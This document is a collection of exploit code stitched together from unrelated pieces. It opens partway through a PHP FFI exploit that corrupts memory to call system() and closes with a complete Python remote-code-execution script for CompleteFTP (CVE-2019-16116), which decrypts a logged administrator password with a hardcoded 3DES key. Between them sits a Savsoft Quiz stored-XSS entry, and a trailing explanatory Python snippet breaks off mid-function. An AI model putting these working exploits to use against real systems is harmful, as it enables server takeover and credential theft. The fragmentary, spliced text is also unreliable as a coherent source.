        $e_phentsize = unpack("S", Read($base + 0x36, 2))[1];
        $e_phnum = unpack("S", Read($base + 0x38, 2))[1];

        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = unpack("L", Read($header, 4))[1];
            $p_flags = unpack("L", Read($header + 4, 4))[1];
            $p_vaddr = unpack("Q", Read($header + 0x10))[1];
            $p_memsz = unpack("Q", Read($header + 0x28))[1];

            if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
                # handle pie
                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
                $text_size = $p_memsz;
            }
        }

        if(!$data_addr || !$text_size || !$data_size)
            return false;

        return [$data_addr, $text_size, $data_size];
    }

    function getBasicFuncs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = unpack("Q", Read($data_addr+ ($i * 8)))[1];
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = unpack("Q", Read($leak))[1];
                # 'constant' constant check
                if($deref != 0x746e6174736e6f63)
                    continue;
            } else continue;
            $leak = unpack("Q", Read($data_addr + (($i + 4) * 8)))[1];
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = unpack("Q", Read($leak))[1];
                # 'bin2hex' constant check
                if($deref != 0x786568326e6962)
                    continue;
            } else continue;
            return $data_addr + $i * 8;
        }
    }

    function getSystem($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = unpack("Q", Read($addr))[1];
            $f_name = Read($f_entry, 6) . "\0";

            if( strcmp($f_name, "system\0") == 0) { # system
                return unpack("Q", Read($addr + 8))[1];
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }
    // Convenient for debugging
    function crash() {
        Write(0x0, "AAAA", 4);
    }
    
    
    printf("\n[+] Starting exploit...\n");
    // --------------------------- start of leak zif_system address
    /* NOTE: typically we would leak a .text address and
      walk backwards to find the ELF header. From there we can parse
      the elf information to resolve zif_system - in our case the
      base PHP binary image with the ELF header is on its own mapping
      that does not border the .text segment. So we need a creative 
      way to get zif_system
    */
    /* ---- First, we use our read to walk back to our zend_object,
    //   and get its zend_object_handlers* which will point to the
    //   php binary symbols zend_ffi_cdata_handlers in the .bss.
    //
    //_zend_ffi_cdata.ptr-holder - _zend_ffi_cdata.ptr.std.handlers == 6 QWORDS
    //
    //   From there we search for a ptr to a known value (happens to be to the .rodata section)
    //   that just so happens to sit right below a ptr to the 'zend_version' relro entry.
    //   So we do some checks on that to confirm it is in fact a valid ptr to the .data.relro.
    //
    //   Finally we walk UP the relro entries looking for the 'system' (zif_system) entry.
    
    (zend_types.h)
    struct _zend_object { <-----typedef zend_object
        zend_refcounted_h gc;
        uint32_t          handle; // may be removed ???
        zend_class_entry *ce;
        const zend_object_handlers *handlers; <--- func ptrs
        HashTable        *properties;
        zval              properties_table[1];
    };
    (ffi.c)
    typedef struct _zend_ffi_cdata {
        zend_object            std;
        zend_ffi_type         *type;
        void                  *ptr; <--- OVERWRITE
        void                  *ptr_holder; <--
        zend_ffi_flags         flags;
    } zend_ffi_cdata;
    
    */ 
    
    list($dummyPtr, $dummy) = allocate(64, 0x41);
    // dummy buf ptr
    $dummyPtrVal = ptrVal($dummyPtr);
    
    // dummy buf ptr ptr
    $dummyPtrPtr = FFI::addr($dummyPtr);
    $dummyPtrPtrVal = ptrVal($dummyPtrPtr);
    
    printf("Dummy BufPtr =  0x%x\n", $dummyPtrVal);
    printf("Dummy BufPtrPtr = 0x%x\n", $dummyPtrPtrVal);
    $r = leak($dummyPtr, 64, 1);
    printf("Dummy buf:\n%s\n", $r);
    printf("-------\n\n");
    
    /*
    // ------ Test our read and write 
    $r = Read($dummyPtrVal, 256, 1);
    printf("Read Test (DummyBuf):\n%s\n", $r);
    
    Write($dummyPtrVal, "CCCCCCCC", 8);
    $r = Read($dummyPtrVal, 256, 1);
    printf("Write Test (DummyBuf):\n%s\n", $r);
    // ----------
    */
    
    $handlersPtrPtr = $dummyPtrPtrVal - (6 * 8);
    printf("_zend_ffi_cdata.ptr.std.handlers = 0x%x\n", $handlersPtrPtr);
    
    $handlersPtr = unpack("Q", Read($handlersPtrPtr))[1]; // --> zend_ffi_cdata_handlers -> .bss
    printf("zend_ffi_cdata_handlers = 0x%x\n", $handlersPtr);
    
    // Find our 'known' value in the .rodata section -- in this case 'Core'
    // (backup can be 'STDIO')
    list($rodataLeak, $rodataLeakPtr) = walkSearch($handlersPtr, 0x400,"Core", $size=4);
    if ( $rodataLeak == 0 ) {
        // If we failed let's just try to find PHP's base and hope for the best
        printf("Get rodata addr failed...trying for last ditch effort at PHP's ELF base\n");
        // use .txt leak
        $textLeak = unpack("Q", Read($handlersPtr+16))[1]; // zend_objects_destroy_object
        printf(".textLeak = 0x%x\n", $textLeak);
        $base = getBinaryBase($textLeak);
        if ( $base == 0 ) {
            die("Failed to get binary base\n");
        }
        printf("BinaryBase = 0x%x\n", $base);
        // parse elf
        if (!($elf = parseElf($base))) {
            die("failed to parseElf\n");
        }
        if (!($basicFuncs = getBasicFuncs($base, $elf))) {
            die("failed to get basic funcs\n");
        }
        if (!($zif_system = getSystem($basicFuncs))) {
            die("Failed to get system\n");
        }
        // XXX HERE XXX
        //die("Get rodata addr failed\n");
    } else {
        printf(".rodata leak ('CORE' ptr) = 0x%x->0x%x\n", $rodataLeakPtr, $rodataLeak);
    
        // Right after the "Core" ptrptr is zend_version's relro entry - XXX this may not be static
        // zend_version is in .data.rel.ro
        $dataRelroPtr = $rodataLeakPtr + 8;
        printf("PtrPtr to 'zend_version' relro entry: 0x%x\n", $dataRelroPtr);
        
        // Read the .data.relro ptr
        $dataRelroLeak = unpack("Q", Read($dataRelroPtr))[1];
        if ( isPtr($dataRelroPtr, $dataRelroLeak) == 0 ) {
            die("bad zend_version entry pointer\n");
        }
        printf("Ptr to 'zend_version' relro entry: 0x%x\n", $dataRelroLeak);
        
        // Confirm this is a ptrptr to zend_version
        $r = unpack("Q", Read($dataRelroLeak))[1];
        if ( isPtr($dataRelroLeak, $r) == 0 ) {
            die("bad zend_version entry pointer\n");
        }
        
        printf("'zend_version' string ptr = 0x%x\n", $r);
        
        $r = Read($r, $n = 12);
        if ( strcmp($r, "zend_version") ) {
            die("Failed to find zend_version\n");
        }
        printf("[+] Verified data.rel.ro leak @ 0x%x!\n", $dataRelroLeak);
        
        
        /* Walk FORWARD the .data.rel.ro segment looking for the zif_system entry
          - this is a LARGE section...
        */
        list($systemStrPtr, $systemEntryPtr) = walkSearch($dataRelroLeak, 0x3000, "system", $size = 6, $up =1);
        if ( $systemEntryPtr == 0 ) {
            die("Failed to find zif_system relro entry\n");
        }
        printf("system relro entry = 0x%x\n", $systemEntryPtr);
        $zif_systemPtr = $systemEntryPtr + 8;
        $r = unpack("Q", Read($zif_systemPtr))[1];
        if ( isPtr($zif_systemPtr, $r) == 0 ) {
            die("bad zif_system pointer\n");
        }
        $zif_system = $r;
    }
    printf("[+] zif_system @ 0x%x\n", $zif_system);
    
    // --------------------------- end of leak zif_system address
    // --------------------------- start call zif_system
    
    
    /* To call system in a controlled manner
       the easiest way is to create cdata object, write target RIP (zif_system's address) to it
       and finally modify it's zend_ffi_type_kind to ZEND_FFI_TYPE_FUNC to call it
    */
    $helper = FFI::new("char* (*)(const char *)");
    //$helper = FFI::new("char* (*)(const char *, int )"); // XXX if we want return_val control
    $helperPtr = FFI::addr($helper);
    
    //list($helperPtr, $helper) = allocate(8, 0x43);
    //$x[0] = $zif_system;
    $helperPtrVal = ptrVal($helperPtr);
    $helperPtrPtr = FFI::addr($helperPtr);
    $helperPtrPtrVal = ptrVal($helperPtrPtr);
    printf("helper.ptr_holder @ 0x%x -> 0x%x\n", $helperPtrPtrVal, $helperPtrVal);
    
    // Walk the type pointers
    //$helperObjPtr = $helperPtrPtrVal - (9 *8); // to top of cdata object
    //printf("helper CDATA object @ 0x%x\n", $helperObjPtr);
    $helperTypePtrPtr = $helperPtrPtrVal - (2 *8); // 2 QWORDs up the struct to the *type ptr
    //printf("helper CDATA type PtrPtr @ 0x%x\n", $helperTypePtrPtr);
    $r = unpack("Q", Read($helperTypePtrPtr))[1];
    if ( isPtr($helperTypePtrPtr, $r) == 0 ) {
        die("bad helper type  pointer\n");
    }
    $helperTypePtr = $r;
    
    // Confirm it's currently ZEND_FFI_TYPE_VOID (0)
    $r = Read($helperTypePtr, $n=1, $hex=1);
    if ( strcmp($r, "00") ) {
        die("Unexpected helper type!\n");
    }
    
    printf("Current helper CDATA type @ 0x%x -> 0x%x -> ZEND_FFI_TYPE_VOID (0)\n", $helperTypePtrPtr, $helperTypePtr);
    
    // Set it to ZEND_FFI_TYPE_FUNC (16 w/ HAVE_LONG_DOUBLE else 15)
    Write($helperTypePtr, "\x10", 1);
    
    printf("Swapped helper CDATA type @ 0x%x -> 0x%x -> ZEND_FFI_TYPE_FUNC (16)\n", $helperTypePtrPtr, $helperTypePtr);
    
    // Finally write zif_system to the value
    Write($helperPtrVal, pack("Q", $zif_system), 8);
    
    // --------------------------- end of call zif_system setup
    // ----------------------- start of build zif_system argument
    /*
        zif_system takes 2 args -> zif_system(*zend_execute_data, return_val)
        For now I don't bother with the return_val, although technically we could control
        it and potentially exit cleanly
    */
    
    // ----------- start of setup zend_execute_data object
    
    /* Build valid zend_execute object
    struct _zend_execute_data {
        const zend_op       *opline;           /* executed opline                
        zend_execute_data   *call;             /* current call                   
        zval                *return_value;
        zend_function       *func;             /* executed function              
        zval                 This;             /* this + call_info + num_args 
        zend_execute_data   *prev_execute_data;
        zend_array          *symbol_table;
        void               **run_time_cache;   /* cache op_array->run_time_cache 
    }; //0x48 bytes
    */
    
    //This.u2.num_args MUST == our number of args (1 or 2 apparently..) [6th QWORD in execute_data]
    $execute_data = str_shuffle(str_repeat("C", 5*8)); // 0x28 C's
    $execute_data .= pack("L", 0); // this.u1.type
    $execute_data .= pack("L", 1); // this.u2.num_args
    $execute_data .= str_shuffle(str_repeat("A", 0x18)); // fill out rest of zend_execute obj
    $execute_data .= str_shuffle(str_repeat("D", 8)); //padding
    
    // ----------- end of setup zend_execute_data object
    // ----------- start of setup argument object
    /* the ARG (zval) object lies right after the execute_data object

    zval {
        value = zend_string* ([8-byte gc header] + [8-byte cached hash] + [QWORD len] + [NUL-terminated bytes])
        u1.type = 6 (IS_STRING)
        u2.???? = [unused]
    }
    */
    */
    
    /* Put the target command in a controlled buffer (TODO - use the dummy buf?).
       The argument is a zend_string: 16 header bytes (zend_refcounted_h gc + zend_ulong h)
       precede the length; zif_system only reads len and val, so the header can be junk.
       The whole argument after the zend_execute_data object looks like this:
    */

    $cmd_ = str_repeat("X", 16); // zend_string gc + h header (not consulted by zif_system)
    $cmd_ .= pack("Q", strlen($cmd)); // string len
    $cmd_ .= $cmd . "\0"; // ensure null terminated!
    list($cmdBufPtr, $cmdBuf) = allocate(strlen($cmd_), 0);
    $cmdBufPtrVal = ptrVal($cmdBufPtr);
    FFI::memcpy($cmdBufPtr, $cmd_, strlen($cmd_));
    printf("cmdBuf Ptr = 0x%x\n", $cmdBufPtrVal);
    
    // Now setup the zval object itself
    $zval = pack("Q", $cmdBufPtrVal); // zval.value (pointer to cmd string)
    $zval .= pack("L", 6); // zval.u1.type (IS_STRING [6])
    $zval .= pack("L", 0); // zval.u2 - unused
    
    $execute_data .= $zval;
    
    // ---------- end of setup argument object
    // ----------------------- start of build zif_system argument
    $res = $helper($execute_data);
    //$return_val = 0x0; // // XXX if we want return_val control
    //$res = $helper($execute_data, $return_val); // XXX if we want return_val control
    // --------------------------- end of call zif_system
}
pwn("touch /tmp/WIN2.txt");
?>
            
# Exploit Title: Savsoft Quiz 5 - Persistent Cross-Site Scripting
# Date: 2020-07-09
# Exploit Author: Ogulcan Unveren(th3d1gger)
# Vendor Homepage:  https://savsoftquiz.com/
# Software Link:  https://github.com/savsofts/savsoftquiz_v5.git
# Version: 5.0
# Tested on: Kali Linux

---Vulnerable Source Code----
// Registration handler: first_name, last_name and the custom fields are taken from
// the request as-is and stored; they are later rendered without output encoding,
// which is what makes the XSS persistent.
function insert_user_2(){
    $userdata=array(
        'email'=>$this->input->post('email'),
        'password'=>md5($this->input->post('password')),
        'first_name'=>$this->input->post('first_name'),
        'last_name'=>$this->input->post('last_name'),
        'contact_no'=>$this->input->post('contact_no'),
        'gid'=>implode(',',$this->input->post('gid')),
        'su'=>'2'
    );
    $veri_code=rand('1111','9999');
    if($this->config->item('verify_email')){
        $userdata['verify_code']=$veri_code;
    }
    if($this->session->userdata('logged_in_raw')){
        $userraw=$this->session->userdata('logged_in_raw');
        $userraw_uid=$userraw['uid'];
        $this->db->where('uid',$userraw_uid);
        $rresult=$this->db->update('savsoft_users',$userdata);
        if($this->session->userdata('logged_in_raw')){
            $this->session->unset_userdata('logged_in_raw');
        }
    }else{
        $rresult=$this->db->insert('savsoft_users',$userdata);
        $uid=$this->db->insert_id();
        foreach($_POST['custom'] as $ck => $cv){
            if($cv != ''){
                $savsoft_users_custom=array(
                    'field_id'=>$ck,
                    'uid'=>$uid,
                    'field_values'=>$cv
                );
                $this->db->insert('savsoft_users_custom',$savsoft_users_custom);
            }
        }
    }
    // remainder of the function not included in the original listing
}

----Vulnerable Request---
POST /index.php/login/insert_user/ HTTP/1.1
Host: savsoftquiz_v5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2/index.php/login/registration/
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
Connection: close
Cookie: ci_session=0lhlr1iv1qgru1u1kmg42lbvj8mprokv
Upgrade-Insecure-Requests: 1

email=hello%40gmail.com&password=password&first_name=XSSPAYLOAD&last_name=test&contact_no=05785555555&gid%5B%5D=1
            
# Exploit Title: CompleteFTP Professional < 12.1.3 - Remote Code Execution
# Date: 2020-03-11
# Exploit Author: 1F98D
# Original Author: Rhino Security Labs
# Vendor Homepage: https://enterprisedt.com/products/completeftp/
# Version: CompleteFTP Professional
# Tested on: Windows 10 (x64)
# CVE: CVE-2019-16116
# References:
# https://rhinosecuritylabs.com/application-security/completeftp-server-local-privesc-cve-2019-16116/
# https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2019-16116
#
# CompleteFTP before 12.1.3 logs an obscured administrator password to a file
# during installation (C:\Program Files (x86)\Complete FTP\Server\Bootstrapper.log)
# if CompleteFTP is configured to permit remote administration (over port 14983) it
# is possible to obtain remote code execution through the administration interface
#
# This script requires the following python modules (uuid is part of the standard library):
# pip install paramiko pycryptodome
# 
#!/usr/local/bin/python3

from paramiko.sftp import CMD_EXTENDED
from base64 import b64encode, b64decode
from Crypto.Util.Padding import unpad
from Crypto.Cipher import DES3
import xml.etree.ElementTree as ET
import paramiko
import struct
import uuid
import sys

# region get_server_info
get_server_info = """
<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<i2:GetServerInfo id="ref-1" xmlns:i2="Admin API">
</i2:GetServerInfo>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
""".strip()
# endregion

# region update_config
update_config = """
<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<i2:UpdateConfig id="ref-1" xmlns:i2="Admin API">
<changes href="#ref-4"/>
</i2:UpdateConfig>
<a1:ConfigDataSet id="ref-4" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/EnterpriseDT.Net.FtpServer.Config/CompleteFTPManager%2C%20Version%3D8.3.3.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D48e55b33069804ce">
<DataSet.RemotingVersion href="#ref-5"/>
<XmlSchema id="ref-6">{XMLSCHEMA}</XmlSchema>
<XmlDiffGram id="ref-7">{XMLDIFFGRAM}</XmlDiffGram>
</a1:ConfigDataSet>
<a2:Version id="ref-5" xmlns:a2="http://schemas.microsoft.com/clr/ns/System">
<_Major>2</_Major>
<_Minor>0</_Minor>
<_Build>-1</_Build>
<_Revision>-1</_Revision>
</a2:Version>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
""".strip()
# endregion

# region xml_schema
xml_schema = """
<?xml version="1.0" encoding="utf-16"?>
<xs:schema id="ConfigDataSet" targetNamespace="http://tempuri.org/ConfigDataSet.xsd" xmlns:mstns="http://tempuri.org/ConfigDataSet.xsd" xmlns="http://tempuri.org/ConfigDataSet.xsd" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:msprop="urn:schemas-microsoft-com:xml-msprop" attributeFormDefault="qualified" elementFormDefault="qualified">
  <xs:element name="ConfigDataSet" msdata:IsDataSet="true" msdata:Locale="en-US" msdata:TimestampingEnabled="False">
    <xs:complexType>
      <xs:choice minOccurs="0" maxOccurs="unbounded">
        <xs:element name="PlugIn">
          <xs:complexType>
            <xs:sequence>
              <xs:element name="PlugInID" msdata:DataType="System.Guid, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:string" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
              <xs:element name="Name" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd">
                <xs:simpleType>
                  <xs:restriction base="xs:string">
                    <xs:maxLength value="100" />
                  </xs:restriction>
                </xs:simpleType>
              </xs:element>
              <xs:element name="ClassName" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd">
                <xs:simpleType>
                  <xs:restriction base="xs:string">
                    <xs:maxLength value="400" />
                  </xs:restriction>
                </xs:simpleType>
              </xs:element>
              <xs:element name="PlugInTypeID" type="xs:int" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
              <xs:element name="Configuration" type="xs:string" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" />
              <xs:element name="CreatedTime" type="xs:dateTime" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
              <xs:element name="ModifiedTime" type="xs:dateTime" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
              <xs:element name="UserInstance" type="xs:boolean" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" />
              <xs:element name="System" type="xs:boolean" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
              <xs:element name="EditorClassName" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0">
                <xs:simpleType>
                  <xs:restriction base="xs:string">
                    <xs:maxLength value="100" />
                  </xs:restriction>
                </xs:simpleType>
              </xs:element>
              <xs:element name="AssemblyPath" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0">
              </xs:element>
              <xs:element name="MinimumEdition" type="xs:int" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" />
              <xs:element name="ChangeSetID" msdata:DataType="System.Guid, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:string" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" />
            </xs:sequence>
          </xs:complexType>
        </xs:element>
        <xs:element name="Server">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="SiteUser">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="Site">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="Node">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="TrashHeap1">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="TrashHeap2">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="ChangeSet">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="RuntimeVariable">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
      </xs:choice>
    </xs:complexType>
    <xs:unique name="PlugIn_Constraint1" msdata:ConstraintName="Constraint1" msdata:PrimaryKey="true">
      <xs:selector xpath=".//mstns:PlugIn" />
      <xs:field xpath="mstns:PlugInID" />
    </xs:unique>
  </xs:element>
</xs:schema>
""".replace("<", "&lt;").replace(">", "&gt;").replace('"', "&#34;").strip()
# endregion

# region xml_diffgram
xml_diffgram = """
<diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
  <ConfigDataSet xmlns="http://tempuri.org/ConfigDataSet.xsd">
    <PlugIn diffgr:id="PlugIn1" msdata:rowOrder="0" diffgr:hasChanges="modified">
      <PlugInID>88428040-73b3-4497-9b6d-69af2f1cc3c7</PlugInID>
      <Name>Process Execution</Name>
      <ClassName>EnterpriseDT.Net.FtpServer.Trigger.ProcessTrigger</ClassName>
      <PlugInTypeID>2</PlugInTypeID>
      <Configuration>{CONFIGURATION}</Configuration>
      <CreatedTime>2020-03-10T18:33:41.107+08:00</CreatedTime>
      <ModifiedTime>2020-03-10T10:52:00.7496654+08:00</ModifiedTime>
      <UserInstance>false</UserInstance>
      <System>true</System>
      <ChangeSetID>{ID}</ChangeSetID>
    </PlugIn>
    <PlugInType diffgr:id="PlugInType1" msdata:rowOrder="0">
      <PlugInTypeID>2</PlugInTypeID>
      <Name>Event</Name>
      <CreatedTime>2009-06-29T11:48:00+08:00</CreatedTime>
      <ModifiedTime>2009-06-29T11:48:00+08:00</ModifiedTime>
    </PlugInType>
    <ChangeSet diffgr:id="ChangeSet1" msdata:rowOrder="0">
      <ChangeSetID></ChangeSetID>
      <Sequence>3</Sequence>
      <CreatedTime>2020-03-10T10:50:44.4209655+08:00</CreatedTime>
      <ModifiedTime>2020-03-10T10:50:44.4209655+08:00</ModifiedTime>
      <IsPrimary>true</IsPrimary>
    </ChangeSet>
  </ConfigDataSet>
  <diffgr:before>
    <PlugIn diffgr:id="PlugIn1" msdata:rowOrder="0" xmlns="http://tempuri.org/ConfigDataSet.xsd">
      <PlugInID>88428040-73b3-4497-9b6d-69af2f1cc3c7</PlugInID>
      <Name>Process Execution</Name>
      <ClassName>EnterpriseDT.Net.FtpServer.Trigger.ProcessTrigger</ClassName>
      <PlugInTypeID>2</PlugInTypeID>
      <Configuration></Configuration>
      <CreatedTime>2020-03-10T18:33:41.107+08:00</CreatedTime>
      <ModifiedTime>2020-03-10T10:50:44.4209655+08:00</ModifiedTime>
      <UserInstance>false</UserInstance>
      <System>true</System>
      <ChangeSetID></ChangeSetID>
    </PlugIn>
  </diffgr:before>
</diffgr:diffgram>
""".strip()
# endregion

# region config
config = """
<TriggerDataSet xmlns="http://tempuri.org/TriggerDataSet.xsd">
    <ProcessConfig>
        <ProcessConfigID>0</ProcessConfigID>
        <MaxProcesses>10</MaxProcesses>
        <RunTimeout>0</RunTimeout>
        <QueueTimeout>0</QueueTimeout>
        <KillOnExit>true</KillOnExit>
    </ProcessConfig>
    <ProcessRule>
        <ProcessRuleID>1</ProcessRuleID>
        <ProcessConfigID>0</ProcessConfigID>
        <Name>trigger</Name>
        <Enabled>true</Enabled>
        <ProcessType>0</ProcessType>
        <ProcessPath>cmd.exe</ProcessPath>
        <Arguments>/c {CMD}</Arguments>
        <PathFilter>*</PathFilter>
        <OnError>false</OnError>
        <OnSuccess>true</OnSuccess>
        <RowOrder>1</RowOrder>
    </ProcessRule>
    <ProcessEvent>
        <ProcessRuleID>1</ProcessRuleID>
        <EventType>LogIn</EventType>
    </ProcessEvent>
</TriggerDataSet>
""".strip()
# endregion

def prepare_update_config(uuid, cmd):
    config_payload = config
    config_payload = config_payload.replace('{CMD}', cmd)
    config_payload = config_payload.replace('<', '&lt;')
    config_payload = config_payload.replace('>', '&gt;')

    diffgram_payload = xml_diffgram
    diffgram_payload = diffgram_payload.replace('{CONFIGURATION}', config_payload)
    diffgram_payload = diffgram_payload.replace('{ID}', uuid)
    diffgram_payload = diffgram_payload.replace('&', '&#38;')
    diffgram_payload = diffgram_payload.replace('<', '&#60;')
    diffgram_payload = diffgram_payload.replace('>', '&#62;')
    diffgram_payload = diffgram_payload.replace('"', '&#34;')

    payload = update_config
    payload = payload.replace('{XMLSCHEMA}', xml_schema)
    payload = payload.replace('{XMLDIFFGRAM}', diffgram_payload)

    return payload

def send_request(sftp, payload):
    # The admin API is tunnelled over SFTP: an SSH_FXP_EXTENDED request whose extension
    # name is 'admin@enterprisedt.com' and whose data is 'SOAP64 ' + base64(SOAP envelope).
    # sftp._request is a private paramiko helper; it returns (reply_type, message).
    payload = b64encode(bytes(payload, 'utf-8')).decode('utf-8')
    res = sftp._request(CMD_EXTENDED, 'admin@enterprisedt.com', 'SOAP64 ' + payload)
    return res

def convert_changeset_id_to_uuid(changeset_id):
    # The SOAP reply carries the .NET Guid as its eleven fields: int32 _a, int16 _b,
    # int16 _c and eight bytes _d.._k. Guid.ToByteArray() emits _a/_b/_c little-endian,
    # which is what uuid.UUID(bytes_le=...) expects; '<' pins that regardless of host.
    a = struct.pack('<i', int(changeset_id[0].text))  # 32
    b = struct.pack('<h', int(changeset_id[1].text))  # 16
    c = struct.pack('<h', int(changeset_id[2].text))  # 16
    d = struct.pack('B', int(changeset_id[3].text))   # 8
    e = struct.pack('B', int(changeset_id[4].text))   # 8
    f = struct.pack('B', int(changeset_id[5].text))   # 8
    g = struct.pack('B', int(changeset_id[6].text))   # 8
    h = struct.pack('B', int(changeset_id[7].text))   # 8
    i = struct.pack('B', int(changeset_id[8].text))   # 8
    j = struct.pack('B', int(changeset_id[9].text))   # 8
    k = struct.pack('B', int(changeset_id[10].text))  # 8

    x = a + b + c + d + e + f + g + h + i + j + k
    return uuid.UUID(bytes_le=x)

def get_uuid(sftp):
    res = send_request(sftp, get_server_info)
    if res[0] != 201:  # 201 == CMD_EXTENDED_REPLY
        print('[!] Error could not request server info via SFTP')
        sys.exit(1)
    
    res = b64decode(res[1].get_string()).decode('utf-8')
    res = ET.fromstring(res)
    changeset_id = res.find('.//SyncChangeSetID')
    uuid = convert_changeset_id_to_uuid(changeset_id)
    return str(uuid)

def login(host, port, user, password):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(host, port, user, password, look_for_keys=False, allow_agent=False)
    return ssh.open_sftp()

def send_command(sftp, cmd):
    uuid = get_uuid(sftp)
    payload = prepare_update_config(uuid, cmd)
    res = send_request(sftp, payload)
    if res[0] != 201:
        print('[!] Error could not send update config request via SFTP')
        sys.exit(1)

def decrypt_password(password):
    # Static 3DES key and IV baked into CompleteFTP: the "obscured" password written to
    # Bootstrapper.log is just base64(3DES-CBC(UTF-16 password)).
    key = b64decode('HKVV76GdVuzXne/zxtWvdjA2d2Am548E')
    iv = b64decode('gVGow/9uLvM=')
    encrypted = b64decode(password)
    cipher = DES3.new(key=key, iv=iv, mode=DES3.MODE_CBC)
    decrypted = cipher.decrypt(encrypted)
    return unpad(decrypted, 8).decode('utf-16')

if len(sys.argv) != 6:
    print('[!] Missing arguments')
    print('[ ] Usage: {} <target> <port> <username> <encrypted-password> <cmd>'.format(sys.argv[0]))
    print("[ ] E.g. {} 192.168.1.128 14983 admin DEomw27OY7sYZs4XjYA2kVB4LEB5skN4 'whoami > C:\\x.txt'".format(sys.argv[0]))
    sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])
username = sys.argv[3]
password = sys.argv[4]
cmd = sys.argv[5]

print('[ ] Decrypting password')
password = decrypt_password(password)
print('[ ] Decrypted password is "{}"'.format(password))

print('[ ] Logging in')
sftp = login(target, port, username, password)

print('[ ] Sending command')
send_command(sftp, cmd)

print('[ ] Command successfully sent, triggering...')
# The process trigger fires on the LogIn event, so a second login runs the command.
sftp = login(target, port, username, password)
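The .NET Guid handling in convert_changeset_id_to_uuid is the part of the script that is easy to get wrong, so here is an added, stand-alone Python example (mine, not the exploit author's or EnterpriseDT's) of the conversion in both directions plus the lookup get_uuid performs. The SOAP reply is a constructed stand-in whose child element names are hypothetical; the field values are those of the PlugInID GUID from the diffgram above, which is enough to check the byte order.

```python
import struct
import uuid
import xml.etree.ElementTree as ET

# A System.Guid is serialised as int32 _a, int16 _b, int16 _c and eight bytes _d.._k.
# Guid.ToByteArray() writes _a, _b and _c little-endian and _d.._k in order; uuid.UUID's
# bytes_le constructor expects exactly that mixed-endian layout.
GUID_STRUCT = struct.Struct("<ihh8B")


def dotnet_guid_fields_to_uuid(fields):
    """Rebuild a uuid.UUID from the eleven (signed) .NET Guid fields, given as ints or strings."""
    values = [int(f) for f in fields]
    if len(values) != 11:
        raise ValueError("a .NET Guid has 11 fields, got %d" % len(values))
    return uuid.UUID(bytes_le=GUID_STRUCT.pack(*values))


def uuid_to_dotnet_guid_fields(value):
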